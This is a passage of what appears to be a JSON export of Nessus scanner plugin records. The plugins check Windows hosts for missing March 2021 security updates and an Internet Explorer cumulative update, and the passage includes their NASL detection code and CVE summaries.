exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.19780\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4571687\") ||\n\n # Windows Server 2012\n# Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.19780\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4571687\") ||\n \n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.19780\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4571687\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21475\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4571687\")\n)\n{\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB4571687 : Cumulative Security Update for Internet Explorer\\n';\n if(os == \"6.3\")\n {\n report += ' - KB4571703 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS20-08', kb:'4571703', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB4571736 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS20-08', kb:'4571736', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB4571729 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS20-08', kb:'4571729', report);\n }\n else if(os == \"6.0\")\n {\n report += ' - KB4571730 : Windows Server 2008 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS20-08', kb:'4571730', report);\n }\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:06:19", "description": "The remote Windows host is missing security update 5000856 or cumulative update 5000844. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26877, CVE-2021-26893, CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26872, CVE-2021-26873, CVE-2021-26875, CVE-2021-26878, CVE-2021-26882, CVE-2021-26898, CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26896, CVE-2021-27063)", "cvss3": {}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000856: Windows Server 2008 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26875", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26882", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26901", "CVE-2021-27063", "CVE-2021-27077"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000844.NASL", "href": "https://www.tenable.com/plugins/nessus/147217", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147217);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26875\",\n \"CVE-2021-26877\",\n \"CVE-2021-26878\",\n \"CVE-2021-26882\",\n \"CVE-2021-26893\",\n \"CVE-2021-26894\",\n \"CVE-2021-26895\",\n \"CVE-2021-26896\",\n \"CVE-2021-26897\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27063\",\n \"CVE-2021-27077\"\n );\n script_xref(name:\"MSKB\", value:\"5000844\");\n script_xref(name:\"MSKB\", value:\"5000856\");\n script_xref(name:\"MSFT\", value:\"MS21-5000844\");\n script_xref(name:\"MSFT\", value:\"MS21-5000856\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0015\");\n\n script_name(english:\"KB5000856: Windows Server 2008 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000856\nor cumulative update 5000844. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26877, CVE-2021-26893, CVE-2021-26894,\n CVE-2021-26895, CVE-2021-26897)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26872,\n CVE-2021-26873, CVE-2021-26875, CVE-2021-26878,\n CVE-2021-26882, CVE-2021-26898, CVE-2021-26899,\n CVE-2021-26901, CVE-2021-27077)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26896,\n CVE-2021-27063)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000844-monthly-rollup-d90d0eb1-6319-4a7e-97f6-68fbd306fd5a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?177a5bc6\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000856-security-only-update-7a0eb0b9-7f1c-44e5-ba3f-4f6e5e92b33e\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?22792d68\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5000856 or Cumulative Update KB5000844.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26897\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000844',\n '5000856'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000844, 5000856])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:25:52", "description": "The remote Windows host is missing security update 5000807.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26866, CVE-2021-26868, CVE-2021-26871, CVE-2021-26872, CVE-2021-26873, CVE-2021-26875, CVE-2021-26878, CVE-2021-26882, CVE-2021-26885, CVE-2021-26898, CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869, CVE-2021-26884)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26879, CVE-2021-26886)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26881)", "cvss3": {}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000807: Windows 10 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26866", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26871", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26875", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26885", "CVE-2021-26886", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26901", "CVE-2021-27077"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000807.NASL", "href": "https://www.tenable.com/plugins/nessus/147230", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147230);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26866\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26871\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26875\",\n \"CVE-2021-26878\",\n \"CVE-2021-26879\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26885\",\n \"CVE-2021-26886\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27077\"\n );\n script_xref(name:\"MSKB\", value:\"5000807\");\n script_xref(name:\"MSFT\", value:\"MS21-5000807\");\n script_xref(name:\"IAVA\", value:\"2021-A-0129-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0015\");\n\n script_name(english:\"KB5000807: Windows 10 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000807.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26866,\n CVE-2021-26868, CVE-2021-26871, CVE-2021-26872,\n CVE-2021-26873, CVE-2021-26875, CVE-2021-26878,\n CVE-2021-26882, CVE-2021-26885, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26881)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000807-os-build-10240-18874-09c57376-4108-4d34-bc89-3d4baec37ade\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dcda9069\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5000807.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26901\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-26881\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000807'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000807])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:25:29", "description": "The remote Windows host is missing security update 5000851 or cumulative update 5000841. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26877, CVE-2021-26881, CVE-2021-26893, CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26872, CVE-2021-26873, CVE-2021-26875, CVE-2021-26878, CVE-2021-26882, CVE-2021-26898, CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26896, CVE-2021-27063)", "cvss3": {}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000851: Windows 7 and Windows Server 2008 R2 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26869", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26875", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26901", "CVE-2021-27063", "CVE-2021-27077"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000841.NASL", "href": "https://www.tenable.com/plugins/nessus/147231", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147231);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26869\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26875\",\n \"CVE-2021-26877\",\n \"CVE-2021-26878\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26893\",\n \"CVE-2021-26894\",\n \"CVE-2021-26895\",\n \"CVE-2021-26896\",\n \"CVE-2021-26897\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27063\",\n \"CVE-2021-27077\"\n );\n script_xref(name:\"MSKB\", value:\"5000841\");\n script_xref(name:\"MSKB\", value:\"5000851\");\n script_xref(name:\"MSFT\", value:\"MS21-5000841\");\n script_xref(name:\"MSFT\", value:\"MS21-5000851\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0015\");\n\n script_name(english:\"KB5000851: Windows 7 and Windows Server 2008 R2 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000851\nor cumulative update 5000841. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26877, CVE-2021-26881, CVE-2021-26893,\n CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26872,\n CVE-2021-26873, CVE-2021-26875, CVE-2021-26878,\n CVE-2021-26882, CVE-2021-26898, CVE-2021-26899,\n CVE-2021-26901, CVE-2021-27077)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26896,\n CVE-2021-27063)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000851-security-only-update-9e198918-a6d6-46d3-8cfb-bd2b1e2ecb99\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7cce9359\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000841-monthly-rollup-3a2cced1-f436-40c3-a8a1-645f86759088\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8c5851d4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5000851 or Cumulative Update KB5000841.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26897\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000841',\n '5000851'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000841, 5000851])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:06:19", "description": "The remote Windows host is missing security update 5000840 or cumulative update 5000847. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26877, CVE-2021-26881, CVE-2021-26893, CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869, CVE-2021-26884)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26886, CVE-2021-26896, CVE-2021-27063)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26868, CVE-2021-26872, CVE-2021-26873, CVE-2021-26875, CVE-2021-26878, CVE-2021-26882, CVE-2021-26898, CVE-2021-26899, CVE-2021-26901)", "cvss3": {}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000840: Windows Server 2012 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26875", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26886", 